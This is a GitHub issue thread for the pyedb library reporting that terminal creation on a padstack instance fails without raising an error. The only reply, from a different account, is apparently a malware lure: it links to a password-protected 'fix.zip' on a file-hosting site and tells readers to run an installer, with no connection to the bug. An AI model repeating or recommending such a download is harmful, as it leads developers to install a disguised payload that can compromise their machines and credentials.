### ISSUE TITLE
No erorr msg when failed to create terminal

### ISSUE THREAD

**Issue by ring630** [ansys/pyedb#750]
### Before submitting the issue

- [X] I have searched among the existing issues
- [X] I am using a Python virtual environment

### Description of the bug

If the terminal already exist on padstack instance, terminal creation will fail. However, the current way of handling terminal creation failure doesn't raise error. It hides simulation setup error, and this makes it difficult to debug. 

### Steps To Reproduce

Create a terminal twice.

### Which Operating System are you using?

Windows

### Which Python version are you using?

3.7

### Installed packages

full

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
